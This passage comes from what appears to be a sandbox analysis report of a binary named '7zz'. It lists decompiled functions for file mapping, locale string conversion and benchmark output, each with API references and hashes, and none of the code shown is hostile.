				if(_t135 == 0) {
					L0040FFFD("MapViewOfFile error");
				}
				 *(_t147 - 4) = 5;
				if( *_t135 != 0) {
					L0040FFFD("Incorrect mapping data");
				}
				 *(_t147 - 0x1c) = _t142 >> 1;
				 *((intOrPtr*)(_t147 - 0x34)) = 0;
				 *(_t147 - 0x30) = 0;
				 *((intOrPtr*)(_t147 - 0x2c)) = 0;
				E00401E9A(_t147 - 0x34, 3);
				 *(_t147 - 4) = 6;
				_t144 = 1;
				while(_t144 <  *(_t147 - 0x1c)) {
					_t94 =  *((intOrPtr*)(_t135 + _t144 * 2));
					if( *((intOrPtr*)(_t135 + _t144 * 2)) != 0) {
						E004054FE(_t147 - 0x34, _t131, __eflags, _t94);
					} else {
						_t131 = _t147 - 0x34;
						E00410AC9( *((intOrPtr*)(_t147 - 0x20)), _t147 - 0x34,  *((intOrPtr*)(_t147 + 8)),  *(_t147 + 0xc));
						 *(_t147 - 0x30) = 0;
						 *((short*)( *((intOrPtr*)(_t147 - 0x34)))) = 0;
					}
					_t144 = _t144 + 1;
				}
				__eflags =  *(_t147 - 0x30);
				if( *(_t147 - 0x30) != 0) {
					L0040FFFD("data error");
				}
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				 *(_t147 - 4) = 4;
				UnmapViewOfFile(_t135);
				__eflags =  *(_t147 - 0x18);
				if( *(_t147 - 0x18) != 0) {
					CloseHandle( *(_t147 - 0x18));
				}
				 *(_t147 + 0xc) = 0;
				 *(_t147 - 4) = 8;
				_t83 = OpenEventA(2, 0,  *(E0041AE3F()));
				__eflags = _t83;
				 *(_t147 + 0xc) = _t83;
				if(_t83 == 0) {
					_t145 = GetLastError();
				} else {
					_t145 = 0;
				}
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				__eflags = _t145;
				if(_t145 == 0) {
					E00467B10(_t147 + 0xc);
				}
				E00467A90(_t147 + 0xc);
				E00407A18( *((intOrPtr*)(_t147 - 0x4c)));
				E00407A18( *((intOrPtr*)(_t147 - 0x58)));
				E00407A18( *((intOrPtr*)(_t147 - 0x40)));
				_t90 = E00407A18( *((intOrPtr*)(_t147 - 0x64)));
				 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
				return _t90;
			}
















                                                                      0x00410dff
                                                                      0x00410e0c
                                                                      0x00410e0f
                                                                      0x00410e11
                                                                      0x00410e19
                                                                      0x00410e1e
                                                                      0x00410e22
                                                                      0x00410e24
                                                                      0x00410e24
                                                                      0x00410e30
                                                                      0x00410e3d
                                                                      0x00410e40
                                                                      0x00410e4b
                                                                      0x00410e4f
                                                                      0x00410e54
                                                                      0x00410e58
                                                                      0x00410e5a
                                                                      0x00410e5a
                                                                      0x00410e67
                                                                      0x00410e75
                                                                      0x00410e79
                                                                      0x00410e83
                                                                      0x00410e8c
                                                                      0x00410e8e
                                                                      0x00410e91
                                                                      0x00410e94
                                                                      0x00410e9a
                                                                      0x00410ea8
                                                                      0x00410eb0
                                                                      0x00410eb3
                                                                      0x00410eb9
                                                                      0x00410eb5
                                                                      0x00410eb5
                                                                      0x00410eb5
                                                                      0x00410ec4
                                                                      0x00410ec8
                                                                      0x00410ed1
                                                                      0x00410ed8
                                                                      0x00410ed8
                                                                      0x00410eeb
                                                                      0x00410eef
                                                                      0x00410ef2
                                                                      0x00410ef9
                                                                      0x00410ef9
                                                                      0x00410f01
                                                                      0x00410f05
                                                                      0x00410f0c
                                                                      0x00410f0c
                                                                      0x00410f18
                                                                      0x00410f1b
                                                                      0x00410f1e
                                                                      0x00410f21
                                                                      0x00410f24
                                                                      0x00410f2b
                                                                      0x00410f2f
                                                                      0x00410f30
                                                                      0x00410f35
                                                                      0x00410f3c
                                                                      0x00410f5e
                                                                      0x00410f3e
                                                                      0x00410f44
                                                                      0x00410f4a
                                                                      0x00410f52
                                                                      0x00410f55
                                                                      0x00410f55
                                                                      0x00410f63
                                                                      0x00410f63
                                                                      0x00410f66
                                                                      0x00410f69
                                                                      0x00410f70
                                                                      0x00410f70
                                                                      0x00410f78
                                                                      0x00410f7e
                                                                      0x00410f86
                                                                      0x00410f8c
                                                                      0x00410f8f
                                                                      0x00410f94
                                                                      0x00410f94
                                                                      0x00410f9a
                                                                      0x00410fa3
                                                                      0x00410fb1
                                                                      0x00410fb7
                                                                      0x00410fb9
                                                                      0x00410fbc
                                                                      0x00410fc8
                                                                      0x00410fbe
                                                                      0x00410fbe
                                                                      0x00410fbe
                                                                      0x00410fcd
                                                                      0x00410fd2
                                                                      0x00410fd5
                                                                      0x00410fda
                                                                      0x00410fda
                                                                      0x00410fe2
                                                                      0x00410fea
                                                                      0x00410ff2
                                                                      0x00410ffa
                                                                      0x00411002
                                                                      0x0041100d
                                                                      0x00411018

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00410DFF
                                                                      • OpenFileMappingA.KERNEL32 ref: 00410EA8
                                                                      • GetLastError.KERNEL32 ref: 00410EB9
                                                                      • MapViewOfFile.KERNEL32(00000002,00000004,00000000,00000000,00000000,?), ref: 00410EE5
                                                                      • UnmapViewOfFile.KERNEL32(00000000,00000003), ref: 00410F86
                                                                      • CloseHandle.KERNEL32(00000002), ref: 00410F94
                                                                      • OpenEventA.KERNEL32(00000002,00000000,00000000), ref: 00410FB1
                                                                      • GetLastError.KERNEL32 ref: 00410FC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: File$ErrorLastOpenView$CloseEventH_prologHandleMappingUnmap
                                                                      • String ID: Can not open mapping$Incorrect mapping data$MapViewOfFile error$data error
                                                                      • API String ID: 3506968402-3547812707
                                                                      • Opcode ID: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
                                                                      • Instruction ID: 429b42cc52d2415495e97970ec32bea979b2661ba41aff62b748449d2bc5275c
                                                                      • Opcode Fuzzy Hash: 536fedebb275c513b52617318d66a2509922886c477389a5a80e1095ca8b336e
                                                                      • Instruction Fuzzy Hash: 4E618C30D01219AEDB11EFA6D882AEDBB75EF44308F10443EF505B7291DB781E85DB9A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00472126 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 61%
                                                                      			E00472126(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, char _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x47cd28);
				_push(E0046CE74);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x4938a0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0047234A(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x4938a0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x493880; // 0x0
								_a28 = _t82;
							}
							_t16 =  &_a32; // 0x496224
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~( *_t16) & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E0046CC80(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E0046CC80(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x47cd24, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x47cd20, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x4938a0 = 2;
							goto L5;
						}
					} else {
						 *0x4938a0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}























                                                                      0x00472129
                                                                      0x0047212b
                                                                      0x00472130
                                                                      0x0047213b
                                                                      0x0047213c
                                                                      0x00472143
                                                                      0x00472149
                                                                      0x0047214e
                                                                      0x00472154
                                                                      0x0047219c
                                                                      0x0047219f
                                                                      0x004721a7
                                                                      0x004721ad
                                                                      0x004721ae
                                                                      0x004721ae
                                                                      0x004721b1
                                                                      0x004721b9
                                                                      0x004721db
                                                                      0x00000000
                                                                      0x004721e1
                                                                      0x004721e4
                                                                      0x004721e6
                                                                      0x004721eb
                                                                      0x004721eb
                                                                      0x004721f6
                                                                      0x004721fb
                                                                      0x0047220b
                                                                      0x0047220d
                                                                      0x00472212
                                                                      0x00000000
                                                                      0x00472218
                                                                      0x00472218
                                                                      0x00472223
                                                                      0x00472228
                                                                      0x0047222d
                                                                      0x00472230
                                                                      0x0047224c
                                                                      0x00000000
                                                                      0x00472267
                                                                      0x00472279
                                                                      0x0047227b
                                                                      0x00472280
                                                                      0x00000000
                                                                      0x00472282
                                                                      0x00472286
                                                                      0x004722c8
                                                                      0x004722d7
                                                                      0x004722dc
                                                                      0x004722df
                                                                      0x004722e1
                                                                      0x004722e4
                                                                      0x004722fe
                                                                      0x00000000
                                                                      0x00472318
                                                                      0x0047231b
                                                                      0x0047231c
                                                                      0x0047231d
                                                                      0x00472323
                                                                      0x00472326
                                                                      0x0047231f
                                                                      0x0047231f
                                                                      0x00472320
                                                                      0x00472320
                                                                      0x00472339
                                                                      0x0047233d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0047233d
                                                                      0x00472288
                                                                      0x0047228b
                                                                      0x00472343
                                                                      0x00472343
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0047228b
                                                                      0x00472286
                                                                      0x00472280
                                                                      0x0047224c
                                                                      0x00472212
                                                                      0x004721bb
                                                                      0x004721cd
                                                                      0x004721cd
                                                                      0x00472156
                                                                      0x00472156
                                                                      0x00472157
                                                                      0x0047215a
                                                                      0x00472170
                                                                      0x0047218c
                                                                      0x004722b4
                                                                      0x004722b4
                                                                      0x00472192
                                                                      0x00472192
                                                                      0x00000000
                                                                      0x00472192
                                                                      0x00472172
                                                                      0x00472172
                                                                      0x00000000
                                                                      0x00472172
                                                                      0x00472170
                                                                      0x004722bc
                                                                      0x004722c7

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000100,0047CD24,00000001,00000000,00000000,746570F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472168
                                                                      • LCMapStringA.KERNEL32(00000000,00000100,0047CD20,00000001,00000000,00000000,?,?,00471FC7,?,?,?,00000000,00000001), ref: 00472184
                                                                      • LCMapStringA.KERNEL32(?,?,?,00471FC7,?,?,746570F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 004721CD
                                                                      • MultiByteToWideChar.KERNEL32(?,$bI,?,00471FC7,00000000,00000000,746570F0,00496224,?,?,?,00471FC7,?,?,?,00000000), ref: 00472205
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00471FC7,?,00000000,?,?,00471FC7,?), ref: 0047225D
                                                                      • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00471FC7,?), ref: 00472273
                                                                      • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,00471FC7,?), ref: 004722A6
                                                                      • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,00471FC7,?), ref: 0047230E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: String$ByteCharMultiWide
                                                                      • String ID: $bI
                                                                      • API String ID: 352835431-2563688255
                                                                      • Opcode ID: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
                                                                      • Instruction ID: 5ffb5e9b6ab65bc4ab37f18ce6ac32945fb5d904f638d9a0d25ac77dd211bcbc
                                                                      • Opcode Fuzzy Hash: 613b29bf82b8a870d737d70060f132928fb253a9dec2a6d6ec0a899db9a9147f
                                                                      • Instruction Fuzzy Hash: F051A031500249EFCF228F94CD85AEF7FB5FB49754F20816AF918A1260D3798D60DBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401679 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 33%
                                                                      			E00401679(void* __ecx, signed int __edx, void* __eflags) {
				void* _t56;
				signed int _t63;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				void* _t75;
				void* _t76;
				signed int _t80;
				signed int _t83;
				void* _t85;
				void* _t90;
				void* _t105;
				void* _t111;
				signed int _t114;
				char* _t115;
				intOrPtr _t117;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t126;
				signed int* _t127;
				signed int* _t129;
				signed int _t130;
				signed int* _t131;
				void* _t132;
				void* _t134;
				char** _t135;

				_t114 = __edx;
				E0046B890(E00472CF8, _t132);
				_t135 = _t134 - 0x28;
				 *(_t132 - 0x1c) = __edx;
				_t90 = __ecx;
				if(E00414B6B(__eflags) != 0) {
					_t56 = E0040C609();
					 *(_t132 - 0x28) = _t114;
					_t126 = E0040C5F4();
					_t115 = "size: ";
					_push(_t126);
					_push("CPU hardware threads:");
					E00401631(_t90, _t56,  *(_t132 - 0x28));
					__eflags =  *(_t132 + 8) - 0xffffffff;
					if( *(_t132 + 8) == 0xffffffff) {
						 *(_t132 + 8) = _t126;
					}
					__eflags =  *((intOrPtr*)(_t132 + 0xc)) - 0xffffffff;
					if( *((intOrPtr*)(_t132 + 0xc)) == 0xffffffff) {
						 *((intOrPtr*)(_t132 + 0xc)) = 0x1000000;
					}
					_t120 =  *(_t132 + 8);
					_push(_t120 << 3);
					_t127 = E004079F2();
					 *(_t132 - 0x14) = _t127;
					 *(_t132 - 0x24) = _t127;
					 *(_t132 - 4) =  *(_t132 - 4) & 0x00000000;
					 *_t135 = "\n\nSize";
					_push(_t90);
					E0046B47B();
					_t63 = 0;
					__eflags = _t120;
					if(_t120 > 0) {
						do {
							_t13 = _t63 + 1; // 0x1
							_t124 = _t13;
							E0046B47B(_t90, " %5d", _t124);
							 *_t127 =  *_t127 & 0x00000000;
							_t127[1] = _t127[1] & 0x00000000;
							_t63 = _t124;
							_t135 =  &(_t135[3]);
							_t127 =  &(_t127[2]);
							__eflags = _t63 -  *(_t132 + 8);
						} while (_t63 <  *(_t132 + 8));
					}
					_push("\n\n");
					_push(_t90);
					E0046B47B();
					__eflags =  *(_t132 - 0x1c);
					 *(_t132 - 0x2c) = 0;
					 *(_t132 - 0x28) = 0;
					 *((intOrPtr*)(_t132 - 0x18)) = 0;
					if( *(_t132 - 0x1c) <= 0) {
						L23:
						E00407A18( *(_t132 - 0x14));
						_t67 = 0;
						__eflags = 0;
					} else {
						do {
							 *(_t132 - 0x10) = 0xa;
							while(1) {
								_t100 =  *(_t132 - 0x10);
								_t68 = 1;
								_t69 = _t68 <<  *(_t132 - 0x10);
								__eflags = _t69 -  *((intOrPtr*)(_t132 + 0xc));
								 *(_t132 - 0x20) = _t69;
								if(_t69 >  *((intOrPtr*)(_t132 + 0xc))) {
									goto L17;
								}
								E0046B47B(_t90, "%2d: ", _t100);
								_t122 = 0;
								_t135 =  &(_t135[3]);
								__eflags =  *(_t132 + 8);
								if( *(_t132 + 8) <= 0) {
									L16:
									_push("\n");
									_push(_t90);
									E0046B47B();
									 *(_t132 - 0x2c) =  *(_t132 - 0x2c) + 1;
									asm("adc dword [ebp-0x28], 0x0");
									 *(_t132 - 0x10) =  *(_t132 - 0x10) + 1;
									__eflags =  *(_t132 - 0x10) - 0x20;
									if( *(_t132 - 0x10) < 0x20) {
										continue;
									} else {
										goto L17;
									}
								} else {
									_t129 =  *(_t132 - 0x14);
									while(1) {
										_t80 = E00401896();
										__eflags = _t80;
										if(_t80 != 0) {
											break;
										}
										_t122 = _t122 + 1;
										_push(_t132 - 0x34);
										_t83 = E00414C98(_t122,  *(_t132 - 0x20));
										__eflags = _t83;
										if(_t83 != 0) {
											_t130 = _t83;
											L27:
											E00407A18( *(_t132 - 0x14));
											_t67 = _t130;
										} else {
											_t117 =  *((intOrPtr*)(_t132 - 0x30));
											_t111 = 0x14;
											_t85 = E0046B2E0( *((intOrPtr*)(_t132 - 0x34)), _t111, _t117);
											_push(_t117);
											_push(_t85);
											_t115 = 5;
											E00401134(_t90, _t115, __eflags);
											 *_t129 =  *_t129 +  *((intOrPtr*)(_t132 - 0x34));
											asm("adc [esi+0x4], ecx");
											_t129 =  &(_t129[2]);
											__eflags = _t122 -  *(_t132 + 8);
											if(_t122 <  *(_t132 + 8)) {
												continue;
											} else {
												goto L16;
											}
										}
										goto L24;
									}
									_t130 = 0x80004004;
									goto L27;
								}
								goto L24;
							}
							L17:
							 *((intOrPtr*)(_t132 - 0x18)) =  *((intOrPtr*)(_t132 - 0x18)) + 1;
							__eflags =  *((intOrPtr*)(_t132 - 0x18)) -  *(_t132 - 0x1c);
						} while ( *((intOrPtr*)(_t132 - 0x18)) <  *(_t132 - 0x1c));
						__eflags =  *(_t132 - 0x2c) |  *(_t132 - 0x28);
						if(( *(_t132 - 0x2c) |  *(_t132 - 0x28)) != 0) {
							_push("\nAvg:");
							_push(_t90);
							E0046B47B();
							_t123 =  *(_t132 + 8);
							__eflags = _t123;
							if(_t123 > 0) {
								_t131 =  *(_t132 - 0x14);
								do {
									_t75 = E0046B300( *_t131, _t131[1],  *(_t132 - 0x2c),  *(_t132 - 0x28));
									_t105 = 0x14;
									_t76 = E0046B2E0(_t75, _t105, _t115);
									_push(_t115);
									_push(_t76);
									_t115 = 5;
									E00401134(_t90, _t115, __eflags);
									_t131 =  &(_t131[2]);
									_t123 = _t123 - 1;
									__eflags = _t123;
								} while (_t123 != 0);
							}
							_push("\n");
							_push(_t90);
							E0046B47B();
						}
						goto L23;
					}
				} else {
					_t67 = 1;
				}
				L24:
				 *[fs:0x0] =  *((intOrPtr*)(_t132 - 0xc));
				return _t67;
			}































                                                                      0x00401679
                                                                      0x0040167e
                                                                      0x00401683
                                                                      0x00401689
                                                                      0x0040168c
                                                                      0x00401695
                                                                      0x0040169f
                                                                      0x004016a6
                                                                      0x004016ae
                                                                      0x004016b0
                                                                      0x004016b5
                                                                      0x004016b6
                                                                      0x004016c1
                                                                      0x004016c6
                                                                      0x004016ca
                                                                      0x004016cc
                                                                      0x004016cc
                                                                      0x004016cf
                                                                      0x004016d3
                                                                      0x004016d5
                                                                      0x004016d5
                                                                      0x004016dc
                                                                      0x004016e4
                                                                      0x004016ea
                                                                      0x004016ec
                                                                      0x004016ef
                                                                      0x004016f2
                                                                      0x004016f6
                                                                      0x004016fd
                                                                      0x004016fe
                                                                      0x00401704
                                                                      0x00401706
                                                                      0x00401709
                                                                      0x0040170b
                                                                      0x0040170b
                                                                      0x0040170b
                                                                      0x00401715
                                                                      0x0040171a
                                                                      0x0040171d
                                                                      0x00401721
                                                                      0x00401723
                                                                      0x00401726
                                                                      0x00401729
                                                                      0x00401729
                                                                      0x0040170b
                                                                      0x0040172e
                                                                      0x00401733
                                                                      0x00401734
                                                                      0x0040173c
                                                                      0x00401740
                                                                      0x00401743
                                                                      0x00401746
                                                                      0x00401749
                                                                      0x0040185b
                                                                      0x0040185e
                                                                      0x00401864
                                                                      0x00401864
                                                                      0x0040174f
                                                                      0x0040174f
                                                                      0x0040174f
                                                                      0x00401756
                                                                      0x00401756
                                                                      0x0040175b
                                                                      0x0040175c
                                                                      0x0040175e
                                                                      0x00401761
                                                                      0x00401764
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401771
                                                                      0x00401776
                                                                      0x00401778
                                                                      0x0040177b
                                                                      0x0040177e
                                                                      0x004017d4
                                                                      0x004017d4
                                                                      0x004017d9
                                                                      0x004017da
                                                                      0x004017df
                                                                      0x004017e5
                                                                      0x004017e9
                                                                      0x004017ec
                                                                      0x004017f0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401780
                                                                      0x00401780
                                                                      0x00401783
                                                                      0x00401783
                                                                      0x00401788
                                                                      0x0040178a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401793
                                                                      0x00401799
                                                                      0x0040179a
                                                                      0x0040179f
                                                                      0x004017a1
                                                                      0x0040187e
                                                                      0x00401880
                                                                      0x00401883
                                                                      0x00401889
                                                                      0x004017a7
                                                                      0x004017aa
                                                                      0x004017af
                                                                      0x004017b0
                                                                      0x004017b7
                                                                      0x004017b8
                                                                      0x004017bb
                                                                      0x004017bc
                                                                      0x004017c7
                                                                      0x004017c9
                                                                      0x004017cc
                                                                      0x004017cf
                                                                      0x004017d2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004017d2
                                                                      0x00000000
                                                                      0x004017a1
                                                                      0x00401877
                                                                      0x00000000
                                                                      0x00401877
                                                                      0x00000000
                                                                      0x0040177e
                                                                      0x004017f6
                                                                      0x004017f6
                                                                      0x004017fc
                                                                      0x004017fc
                                                                      0x00401808
                                                                      0x0040180b
                                                                      0x0040180d
                                                                      0x00401812
                                                                      0x00401813
                                                                      0x00401818
                                                                      0x0040181c
                                                                      0x0040181f
                                                                      0x00401821
                                                                      0x00401824
                                                                      0x0040182f
                                                                      0x00401836
                                                                      0x00401837
                                                                      0x0040183e
                                                                      0x0040183f
                                                                      0x00401842
                                                                      0x00401843
                                                                      0x00401848
                                                                      0x0040184b
                                                                      0x0040184b
                                                                      0x0040184b
                                                                      0x00401824
                                                                      0x0040184e
                                                                      0x00401853
                                                                      0x00401854
                                                                      0x0040185a
                                                                      0x00000000
                                                                      0x0040180b
                                                                      0x00401697
                                                                      0x00401699
                                                                      0x00401699
                                                                      0x00401866
                                                                      0x0040186c
                                                                      0x00401874

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040167E
                                                                        • Part of subcall function 00414B6B: __EH_prolog.LIBCMT ref: 00414B70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: Avg:$ $ %5d$%2d: $CPU hardware threads:$size:
                                                                      • API String ID: 3519838083-1473790758
                                                                      • Opcode ID: b95e5d18777f8c829bc06347f2ade39e5bb4edbb476a6909730488946cc3f890
                                                                      • Instruction ID: cf4bf7488a743daec15e4d6fa5ec6e5030c6436caeeb10ae79287eb816e5538f
                                                                      • Opcode Fuzzy Hash: b95e5d18777f8c829bc06347f2ade39e5bb4edbb476a6909730488946cc3f890
                                                                      • Instruction Fuzzy Hash: 7851B472D00208ABDB10EF65DC41AAE77B5EF44364F20842FF854B72D1DB7D99818B99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00414269 Relevance: 12.5, APIs: 8, Instructions: 493COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 87%
                                                                      			E00414269(unsigned int __ecx, signed int __edx) {
				void* __edi;
				signed int _t241;
				signed int _t242;
				signed int _t247;
				signed int _t249;
				intOrPtr* _t262;
				signed int _t269;
				intOrPtr* _t280;
				signed int _t281;
				intOrPtr* _t289;
				intOrPtr* _t292;
				intOrPtr _t294;
				signed int _t295;
				signed int _t303;
				signed int _t309;
				signed int _t314;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				intOrPtr* _t327;
				unsigned int _t328;
				signed int _t383;
				signed int _t389;
				signed int _t391;
				signed int _t392;
				intOrPtr* _t393;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				void* _t401;
				intOrPtr _t404;
				signed int _t405;
				void* _t408;
				signed int _t409;
				intOrPtr* _t410;
				void* _t411;
				intOrPtr* _t422;

				_t378 = __edx;
				_t328 = __ecx;
				E0046B890(E00474718, _t411);
				_t241 = 1;
				 *(_t411 - 0x2c) = __edx;
				 *((intOrPtr*)(_t411 - 0x8c)) = __ecx;
				if(__ecx <= _t241) {
					_t389 = _t241;
				} else {
					_t389 = __ecx >> 1;
				}
				 *(_t411 - 0x1c) = _t389;
				 *(_t411 - 0x24) = (0 | _t328 - _t241 > 0x00000000) + 1;
				if(_t378 < 0x40000 || _t328 < _t241 || _t389 > 0x10000) {
					_t242 = 0x80070057;
				} else {
					_push(_t389);
					E00414920(_t411 - 0x18);
					_t398 =  *(_t411 - 0x18);
					 *(_t411 - 4) =  *(_t411 - 4) & 0x00000000;
					 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
					_t323 = _t398;
					 *(_t411 - 0x20) = _t323;
					if(_t389 <= 0) {
						L17:
						 *(_t411 - 0x10) =  *(_t411 - 0x10) & 0x00000000;
						 *((intOrPtr*)(_t411 - 0x94)) = 0x159a55e5;
						_t430 = _t389;
						 *((intOrPtr*)(_t411 - 0x90)) = 0x1f123bb5;
						if(_t389 <= 0) {
							L36:
